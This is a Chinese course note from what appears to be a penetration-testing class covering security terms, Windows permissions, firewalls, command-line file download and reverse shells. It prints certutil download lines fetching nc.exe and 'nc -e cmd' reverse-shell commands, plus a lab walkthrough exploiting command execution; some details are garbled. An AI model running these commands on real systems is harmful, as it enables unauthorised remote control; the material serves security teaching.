第1天:基础入门-操作系统&名词&文件下载&反弹SHELL&防火墙绕过|小迪安全笔记|网络安全|

第1天:基础入门-操作系统&名词&文件下载&反弹SHELL&防火墙绕过

一、基础入门02:55

1. 知识点03:04

1)名词解释04:06
  • POC与EXP:

    • POCPOCPOC

      (Proof of Concept):概念验证代码,用于证明漏洞存在,通常无害

    • EXPEXPEXP

      (Exploit):漏洞利用代码,用于实际攻击,通常有害

    • 关系:先有POC验证漏洞,再开发EXP进行利用

  • Payload与Shellcode:

    • PayloadPayloadPayload

      :漏洞利用成功后执行的代码/指令,包含权限移交方式和通道

    • ShellcodeShellcodeShellcode

      :Payload的一种,特指建立正向/反向shell的代码

  • 后门与Webshell:

    • 后门:系统隐蔽控制通道的统称

    • WebshellWebshellWebshell

      :专指网站后门,通过web应用执行的恶意脚本

  • 木马与病毒:

    • 木马:以控制目标为主(如灰鸽子、Ghost)
    • 病毒:以破坏系统为主,感染文件使其无法运行
  • 反弹与跳板:

    • 反弹:将权限转移到攻击者控制端
    • 跳板:作为中间节点间接访问目标(如代理服务器)
2)渗透测试常用术语04:26
  • 测试方法:
    • 黑盒测试:无任何目标信息(如代码、架构)
    • 白盒测试:掌握完整目标信息
    • 灰盒测试:介于黑白盒之间
  • 攻击技术:
    • 暴力破解:尝试所有可能组合(如密码爆破)
    • 社会工程学:利用人性弱点(如钓鱼邮件)
    • 撞库:使用泄露的账号密码尝试登录其他平台
  • 专业概念:
    • 肉鸡:被控制的设备(如摄像头组成的僵尸网络)
    • Rootkit:隐蔽的系统级后门工具
    • 蠕虫病毒:自主传播的破坏性程序(如Stuxnet震网)
3)攻击与防御技术14:28
  • 攻击基础设施:
    • 僵尸网络(Botnet):被集中控制的设备集群
    • 网页木马:通过网页漏洞植入恶意代码
    • 挖矿木马:劫持设备算力进行加密货币挖掘
  • 防御要点:
    • 多因素认证:防止凭证爆破
    • 权限最小化:限制账户操作范围
    • 日志监控:检测异常行为模式
4)ATT&CK框架14:44
  • MITRE ATT&CK®
  • 核心价值:
    • 标准化攻击技术命名(如T1537-云服务发现)
    • 提供防御措施参考矩阵
    • 基于真实攻击行为观察
  • 技术分类:
    • 初始访问(9种技术):如钓鱼攻击
    • 权限提升(13种技术):如漏洞利用
    • 横向移动(9种技术):如Pass the Hash
  • 应用场景:
    • 渗透测试报告撰写
    • 红蓝对抗演练
    • 安全产品能力评估
  • 参考资源:

2. 操作系统16:56

1)操作系统用途、命令和权限17:16
  • 操作系统用途
    • 个人计算机与服务器区别:
      • 个人用机:Windows 10等,偏向个人日常使用
      • 服务器用机:Windows Server 2008/2012/2016等,用于架设网站和应用服务
    • 安全测试应用:
      • 识别系统类型可判断渗透目标性质(个人电脑或服务器)
      • 例外情况:少数用户会交叉使用(服务器系统用于个人或反之)
  • 系统命令19:46
    • 命令学习要点
      • 学习原则:
        • 只需了解基础命令存在性
        • 重点掌握查询和使用方法而非死记硬背
      • 主流系统:
        • Windows和Linux占服务器主要份额
        • macOS多用于个人电脑,服务器较少见
    • 命令类型
      • Windows命令:
        • 通过cmd调用命令提示窗
        • PowerShell是新型命令行工具(后续讲解)
      • Linux命令:
        • 包含Ubuntu、CentOS等发行版命令
        • 深度测试常用命令可参考专业备忘表
    • Windows常用命令
      • 系统维护命令:
        • sfc /scannow:Windows文件保护扫描
        • chkdsk.exe:磁盘检查工具
      • 管理工具命令:
        • compmgmt.msc:计算机管理
        • eventvwr:事件查看器
        • regsvr32:DLL注册/注销
    • 文件操作命令21:20
      • 目录操作:
        • DIR:显示目录内容(参数:/S查找子目录,/P分页)
        • MD/MKDIR:创建目录(例:MKDIR HELLOWORLD)
        • CD:切换目录(CD...返回上级,CD\返回根目录)
      • 文件操作:
        • DEL:删除文件
        • COPY:复制文件
        • ATTRIB:修改文件属性
2)文件操作
  • 图形化与命令行关系:图形界面操作都可以通过命令行实现,如创建文件夹、删除文件等基础操作
  • 命令学习方法:
    • 不需要记忆所有命令,使用时查询即可
    • 可通过"命令+功能关键词"在搜索引擎查询(如"linux 显示文件命令")
    • 实际操作中尝试执行验证命令效果
  • Windows常用命令:
    • DIR:列出目录内容,可配合参数使用,如DIR /s查找子目录
    • MD/MKDIR:创建目录,如MKDIR HELLOWORLD
    • CD/CHDIR:切换目录,支持相对路径和绝对路径
    • RD/RMDIR:删除目录,/s参数可删除目录下所有内容
    • COPY:复制文件,如COPY d:\pwin98*.* d:\presetup
    • ATTRIB:修改文件属性,可设置只读®、隐藏(H)等属性
  • Linux命令特点:
    • 与Windows命令功能相似但语法不同
    • 常用基础命令包括cat、more、less、head、tail等文件查看命令
    • 包管理命令如yum(显示已安装包yum list installed)
3)应用案例24:19
  • 例题:操作系统权限应用
    • 权限类型:
      • 文件权限:控制文件能否被读取、修改或删除
      • 用户权限:决定用户可以执行的操作范围
      • 服务权限:限制服务可访问的资源
    • 提权必要性:
      • 当当前权限不足以完成目标操作时需要提权
      • 典型场景包括:
        • 访问受保护的文件内容
        • 修改系统关键配置
        • 安装软件或服务
        • 获取数据库敏感数据
    • 文件权限问题:
      • 基础操作限制:删除、编辑、更改等操作可能被禁止
      • 解决方案:通过权限提升或特殊方法绕过限制
4)文件权限26:06
  • 文件打开与权限问题26:08
    • 权限验证机制:当尝试打开C盘下的test文件时系统提示"没有权限",说明Windows会对用户权限进行实时验证。
    • 权限继承性:即使当前用户创建了文件(如桌面新建文本文档),若后续修改权限设置为拒绝,仍会导致无法访问。
  • 文件保存与权限设置26:23
    • 权限优先级:拒绝权限优先于允许权限,当用户同时被赋予允许和拒绝权限时,系统会优先执行拒绝操作。
    • 权限修改步骤:
      • 右键文件选择"属性"→"安全"选项卡
      • 编辑用户/组的权限条目
      • 勾选"拒绝"列的完全控制选项
      • 应用设置后立即生效
  • 用户与文件权限的关联27:20
    • 用户身份确认:通过whoami命令可查看当前登录用户的完整名称(如输出"xiaodi-pc\xiaodi")。
    • 权限生效原理:当在文件权限设置中拒绝特定用户(如xiaodi)的访问权限后,该用户将无法进行任何文件操作。
    • 权限恢复方法:需要以管理员身份重新编辑权限,取消拒绝选项才能恢复访问。
  • 管理员组与用户权限28:48
    • 用户组机制:
      • Administrators组包含所有管理员账户
      • 用户加入该组即获得管理员权限
    • 权限冲突处理:当用户同时属于多个组时:
      • 若任一组的权限被拒绝,则拒绝生效
      • 需要所有相关组都允许才能正常访问
    • 典型场景:即使用户账户有权限,若所属的Administrators组被拒绝,仍然无法访问文件。
5)计算机管理29:09
  • 用户和组的权限29:12
    • 查看方式:通过计算机管理可以查看当前用户的权限设置,路径为"计算机管理→本地用户和组"。
    • 命令获取:也可以通过命令方式获取本地用户信息,使用"whoami"命令查看当前用户身份。
  • 用户和组的配置29:21
    • 组成员关系:在用户属性中可查看用户所属的组,如Administrators组表示管理员权限。
    • 权限继承:用户会继承所属组的权限设置,组权限变更会影响所有组成员。
  • 权限的继承与影响29:30
    • 组权限优先:即使单独修改用户权限,若组权限设置为拒绝,组成员仍会受限制。
    • 实时生效:权限变更需要点击"应用"按钮才能生效,部分设置需用户重新登录后生效。
  • 提权的概念与原因31:01
    • 提权必要性:当获取的权限不足以完成目标操作时,需要进行权限提升。
    • 限制因素:低权限用户受系统配置限制,无法执行某些敏感操作或访问关键数据。
  • Windows权限等级划分31:37
    • 最高权限:SYSTEM权限,可操作系统核心文件(如删除Windows系统目录)。
    • 管理员权限:Administrator权限,日常使用电脑的标准权限,无法删除系统关键文件。
    • 普通用户:User权限,功能受限,常用于特定服务访问(如科学上网服务器用户)。
    • Linux对比:Linux系统有类似的用户组权限机制,root用户相当于Windows的SYSTEM权限。
    • 权限验证:使用"whoami"命令可查看当前用户身份,确认权限级别。
    • 服务账户:系统会创建特定服务账户(如SQL Server服务账户)用于运行特定服务。
6)防火墙33:32
  • 防火墙与渗透测试的关系33:37
    • 网站测试影响: 默认防火墙策略允许网站协议通讯,导致网站安全测试时防火墙开闭影响不大
    • 内网渗透差异: 内网渗透使用TCP等协议进行横向移动时,防火墙会严格限制这些协议
  • 防火墙策略与网站协议通讯33:55
    • 默认放行规则: 防火墙默认允许ADP协议数据通过,这是网站测试不受限的主要原因
    • 协议决定限制: 防火墙是否限制取决于攻击使用的协议是否在其阻止列表中
  • 出站与入站的概念34:11
    • 出站(除粘): 本地主动向外连接的行为,如访问外部网站
    • 入站(如粘): 外部主动连接本地的行为,如被远程控制
    • 策略差异: 防火墙对出站限制宽松,对入站限制严格
  • Windows防火墙的默认策略34:41
    • 查看方法: 通过"控制面板→系统和安全→Windows Defender防火墙"查看规则
    • 规则标识: 勾选标记表示允许的协议/应用,未勾选表示被阻止
    • 自定义配置: 可手动修改出站/入站规则以允许特定流量
  • 防火墙对内外网攻击的不同影响36:43
    • 外网攻击特点: 主要走网站协议(HTTP/HTTPS),默认被放行
    • 内网攻击特点: 使用TCP/UDP等协议进行横向移动,通常被严格限制
    • 流量方向: 南北向流量(内外通讯)与东西向流量(内网横向)受控程度不同
  • Web应用防火墙(WAF)的介绍39:26
    • 定义: Web Application Firewall,专门防护Web应用的防火墙
    • 与系统防火墙区别:
      • WAF针对应用层(如SQL注入、XSS等攻击)
      • 系统防火墙针对网络层(如端口、协议控制)
    • 常见产品: 安全狗、宝塔、云盾等第三方安全产品
    • 部署方式: 需要额外安装,非系统自带组件
7)文件上传下载40:53
  • 学习目的:解决无图形化环境下的数据传输问题
  • 技术分类:
    • Linux系统:wget/curl命令、Python/Ruby/Perl/Java脚本环境
    • Windows系统:PowerShell/Certutil/Bitsadmin/msiexec/mshta/rundl132等命令
  • 应用场景:
    • 渗透测试时通过webshell或CS/MSF等工具上传攻击脚本
    • 服务器无图形界面时进行文件传输操作
8)无图形化下载问题42:17
  • 核心问题:
    • 操作限制:无法通过图形界面进行拖拽/点击等常规文件操作
    • 权限限制:通常仅提供命令行交互权限
  • 解决方案:
    • 命令记忆技巧:重点掌握常用命令,其他命令可现查资料
    • 传输原理:利用系统自带命令或脚本环境建立数据传输通道
  • 典型场景举例:
    • 上传渗透工具到目标服务器
    • 从受控主机下载敏感数据
    • 在受限环境中部署攻击载荷

3. 攻击篇44:11

1)电子词典44:16
  • 资源网站:推荐forum.ywhack.com网站,该网站包含大部分网络安全学习资料
  • [~]#棱角 ::Edge.Forum*
  • 使用建议:虽然资料不完整,但可作为知识库和工具集使用,需要长期关注积累
2)文件下载44:46
  • 命令生成:网站提供文件下载命令快捷生成功能,包含多种环境下的下载命令
  • 实用工具:支持HTTP Server、Python HTTP、Python FTP等多种下载方式
  • 学习建议:通过长期关注和搜索积累优质资源网站,扩展知识面
3)编码转换44:56
  • 功能支持:提供URL编码、Base64编码、Hex编码、HTML编码等多种编码转换
  • 工具特点:集成多种编码转换功能于一体,方便安全测试使用
4)应用案例45:21
  • 例题:Xshell远程连接
    • 连接特点:Linux服务器采用命令行界面操作,不同于Windows的图形化界面
    • 操作本质:通过输入特定命令实现所需功能
    • 演示内容:展示了使用Xshell工具连接阿里云ECS服务器的完整过程
    • 环境信息:连接的是Ubuntu 16.04.7 LTS系统

二、文件下载命令45:42

1. Linux系统文件下载命令45:52

  • 基础命令:wget和curl是Linux系统自带的文件下载命令,可通过"wget url"或"curl url"格式直接下载文件
  • 多语言支持:除系统命令外,还可使用python、ruby、perl、java等编程语言实现下载功能
  • 重命名参数:使用"-O"参数可指定下载后文件名,如"wget http://example.com/file -O newname"
  • 实际应用:渗透测试时需要将工具下载到目标服务器,需先搭建下载地址(网站或FTP)

2. 文件下载命令生成工具49:36

  • 工具用途:自动生成Windows/Linux系统的文件下载命令
  • 参数配置:
  • 命令类型:
    • PowerShell命令(区分大小写)
    • CMD命令(不区分大小写)
  • 生成示例:

3. 示例:使用PowerShell下载文件50:14

  • 执行过程:
    • 打开PowerShell窗口
    • 粘贴生成的下载命令
    • 查看下载文件的时间戳验证下载成功
  • 注意事项:
    • 需要系统允许执行PowerShell脚本
    • 可能被安全软件拦截
    • 下载目录需要写入权限

4. 示例:使用cmd下载文件51:02

  • 常用命令:
  • 权限问题:
    • 系统目录(如C:\)可能限制写入
    • 建议使用临时目录(如C:\temp)
  • 验证方法:
    • 使用dir命令查看目录内容
    • 检查文件大小是否匹配
    • 确认文件时间戳为下载时间

5. 文件下载权限问题51:56

  • 常见问题:
    • 命令执行成功但文件未出现
    • 可能原因包括目录权限不足、安全软件拦截
  • 解决方案:
    • 切换到有写入权限的目录(如temp)
    • 使用"cd C:\temp"命令切换目录
    • 在权限充足的目录重新执行下载命令
  • 调试技巧:
    • 先尝试创建测试文件确认目录可写
    • 使用绝对路径避免路径错误
    • 检查杀毒软件日志确认是否被拦截

三、反弹Shell命令54:07

1. 反弹Shell的作用

  • 解决数据回显问题:在渗透测试中,很多工具只发送命令不接收返回结果,导致无法确认命令执行情况。反弹Shell可以将执行结果回传给攻击者,例如执行certutil.exe -urlcache -split -f http://www.xiaodi8.com:80/nc.exe exploit.exe时能明确看到"CertUtil: -URLCache 命令成功完成"的反馈。
  • 解决交互式命令问题:像passwd修改密码这类需要用户交互的命令,在Webshell环境下无法正常执行。反弹Shell可以建立完整的交互通道,支持需要用户输入的指令。

2. 反弹Shell的实现方式

  • Linux系统常用工具:
    • wget:文件下载
    • curl:支持多种协议的数据传输
    • python/ruby/perl:脚本语言实现复杂功能
    • java:跨平台应用
  • Windows系统常用工具:
    • PowerShell:强大的脚本环境
    • Certutil:证书工具可用于文件下载
    • Bitsadmin:后台智能传输服务
    • msiexec/mshta/rundll32:系统组件利用

3. 实用案例解析

  • 案例1:无图形化文件传输:
    • 通过命令行工具实现文件上传下载,如使用certutil下载文件:certutil.exe -urlcache -split -f http://www.xiaodi8.com:88/nc.exe c:\exploit.exe
    • 解决没有GUI界面时的数据传输问题
  • 案例2:防火墙绕过策略:
    • 正向连接:攻击者直接连接目标服务
    • 反向连接:目标机主动连接攻击者(更易绕过防火墙)
    • 内网服务器通常采用反向连接方式建立通信

4. 系统权限相关概念

  • 权限分类:
    • 文件权限:控制对文件的读写执行
    • 服务权限:决定服务账户的操作范围
    • 用户权限:用户角色对应的特权级别
  • 用户体系:
    • 系统用户与用户组的划分
    • 服务用户的特殊权限配置
  • 防火墙规则:
    • 出站/入站策略配置
    • 协议类型限制(TCP/UDP等)

四、内外网连接01:00:02

1. 基本概念

  • 外网定义:指公共互联网环境,如阿里云等云服务器,具有全球唯一的IP地址
  • 内网定义:指局域网环境(家庭/学校/企业网络),通过路由器统一出口连接外网,典型如192.168.x.x地址段
  • 网络结构:内网设备通过路由器NAT转换共享同一个公网IP访问外网,类似"多部电话共用总机号码"

2. 连接特性

  • 单向可达性:
    • 内网设备可主动连接外网(知道目标唯一地址)
    • 外网无法直接连接内网设备(内网IP非全局唯一)
  • 通信原理:
    • 数据出站:内网设备→路由器NAT转换→外网目标
    • 数据回传:外网→路由器出口IP→需端口映射才能到达具体内网设备

3. 实验验证

1)NC工具使用
  • 工具介绍:网络瑞士军刀,支持端口测试、数据传输等功能
  • 参数说明:
    • nc -lvvp 577:监听本地577端口
    • nc -e cmd 49.215.577:将本地cmd权限移交至目标IP的577端口
2)连接测试案例
  • 成功案例:
    • 内网虚拟机通过nc -e cmd 小篱笆.com:577成功建立连接
    • 外网服务器显示连接来自路由器公网IP(非内网真实IP)
  • 失败案例:
    • 外网尝试nc -e cmd 内网IP:577连接失败
    • 原因:内网IP在公网不可路由,且路由器未配置端口映射

4. 解决方案

  • 端口映射:
    • 在路由器配置特定端口的转发规则
    • 示例:将公网IP的577端口流量转发至内网192.168.1.100的577端口
  • 应用场景:
    • 远程桌面连接内网主机
    • 内网服务器对外提供服务
    • 需要双向通信的特殊应用

5. 关键结论

  • 本质区别:内网IP可重复(不同局域网可用相同地址段),外网IP必须全局唯一
  • 通信限制:外网主动连接内网必须依赖端口映射/NAT穿透等特殊配置
  • 安全影响:内网设备对外连接会暴露路由器公网IP,但不会暴露内网真实拓扑

五、防火墙实验演示01:15:57

1. 实验环境搭建

  • 主机配置:使用两台外网主机进行测试,分别是米纳斯主机和小李巴达主机
  • 网络工具:使用nc(netcat)工具进行网络连接测试,监听端口为566端口

2. 正常通信测试

  • 连接过程:
    • 主机A监听本地566端口:nc -lvp 566
    • 主机B向主机A发送连接:nc <IP地址> 566
  • 验证方法:成功建立连接后可执行命令,证明双向通信正常

3. 防火墙影响测试

  • 现象观察:
    • 开启Windows防火墙后,连接立即超时失败
    • 关闭防火墙后,连接恢复正常
  • 关键结论:防火墙会阻断未经允许的入站连接

六、正反向连接原理01:21:56

1. 基本概念

  • 防火墙策略:
    • 入站检测严格:对外部主动连接进行严格审查
    • 出站检测宽松:对内部主动外连相对宽松
  • 连接方向判定:需明确以哪台主机为参照基准

2. 正向连接

  • 定义:以渗透主机为基准,主动连接目标主机的行为
  • 特点:
    • 易被防火墙拦截(属于目标主机的入站连接)
    • 示例:攻击机主动连接目标机的566端口

3. 反向连接

  • 定义:让目标主机主动连接渗透主机的行为
  • 特点:
    • 绕过防火墙限制(属于目标主机的出站连接)
    • 示例:在目标机执行nc -e cmd <攻击机IP> 566
  • 优势:利用防火墙出站宽松策略,提高连接成功率

4. 基准参照原则

  • 相对性:正反向判定完全取决于以哪方为基准
    • 以A为基准:A→B为正向
    • 以B为基准:A→B为反向
  • 实战应用:渗透测试中通常以攻击方为基准进行定义

5. 技术实现对比

  • 正向连接命令:nc <目标IP> 566(攻击机执行)
  • 反向连接命令:nc -e cmd <攻击机IP> 566(目标机执行)
  • 版本差异:注意不同版本nc的参数支持情况

七、应用案例01:30:58

1. 例题:服务器渗透

  • 实战演示:通过文件下载和反弹shell两个命令完成真实服务器渗透
  • 靶场说明:使用"皮卡丘"挖宝应用靶场,该靶场存在SQL注入、文件上传、命令执行等多种漏洞
  • 技术要点:
    • 利用命令执行漏洞进行文件下载(nc工具)
    • 通过nc实现反弹shell连接
    • 区分Windows和Linux系统的判断方法(ipconfig/ifconfig命令)
  • 操作步骤:
    • 检测目标是否存在命令执行漏洞
    • 使用文件下载命令将nc工具上传至目标服务器
    • 在攻击机监听端口
    • 在目标服务器执行反弹shell命令
  • 注意事项:
    • 在线靶机存在安全风险,可能被恶意利用
    • 现代靶场多采用容器技术限制权限范围
    • 演示仅用于教学目的,禁止实际攻击行为

八、总结01:40:44

  • 核心知识点:
    • 文件下载类操作
    • 反弹shell技术
    • 系统权限管理
  • 系统分类:
    • 个人主机与服务器主机的区别
    • Windows与Linux系统的命令差异
  • 网络安全要素:
    • 防火墙配置
    • 内外网隔离
    • 正向/反向连接方式
  • 权限管理:
    • 文件权限设置
    • 用户权限控制
    • 运维权限分配
  • 学习建议:
    • 掌握基础命令是前提
    • 思路比具体技术更重要
    • 避免直接攻击在线靶机

九、知识小结

知识点 核心内容 技术要点/易混淆点 难度系数
文件下载 解决无图形化环境下的文件传输问题 WINDOWS/Linux不同命令(weget/curl/powershell) ⭐⭐
反弹Shell 解决数据回显和交互式命令问题 正向/反向连接区别、防火墙策略(入站严格/出站宽松) ⭐⭐⭐
操作系统安全基础 用途/命令/权限/防火墙四维度 服务器vs个人主机区别、system/administrator/user权限层级 ⭐⭐
网络通讯问题 内网与外网连接差异 端口映射原理、NAT环境下数据反弹限制 ⭐⭐⭐⭐
专业名词解释 POC/EXP/木马/病毒等定义 POC(验证)vs EXP(利用)、web shell与系统后门区别
实战案例 通过漏洞利用+文件下载+反弹Shell控制靶机 命令执行漏洞利用、nc工具上传与反弹技巧 ⭐⭐⭐⭐
防火墙绕过 正向/反向连接选择依据 以参照物判断连接方向、出站流量绕过策略 ⭐⭐⭐
社会工程学 利用人为弱点攻击 密码心理学、社工库(泄露数据整合平台) ⭐⭐
相关推荐
d111111111d2 小时前
STM32的ADC是什么,其转换精度通常有那些选项?
笔记·stm32·单片机·嵌入式硬件·学习
一只旭宝2 小时前
Linux专题十:I/O 复用进阶(LT/ET 模式)同步,异步阻塞,以及 libevent 库核心知识点
linux·服务器·网络
好奇龙猫2 小时前
【大学院-筆記試験練習:数据库(データベース問題訓練) と 软件工程(ソフトウェア)(2)】
学习·大学院
iconball2 小时前
个人用云计算学习笔记 --31 华为云运维服务
运维·笔记·学习·华为云·云计算
wniuniu_2 小时前
ceph修改
网络·ceph
蓝之白2 小时前
Web8-矛盾
web安全·ctf
幺零九零零2 小时前
压测-JMeter学习
学习·jmeter
94620164zwb52 小时前
关于应用模块 Cordova 与 OpenHarmony 混合开发实战
python·学习
代码游侠2 小时前
复习——网络测试工具
linux·开发语言·网络·笔记·学习·测试工具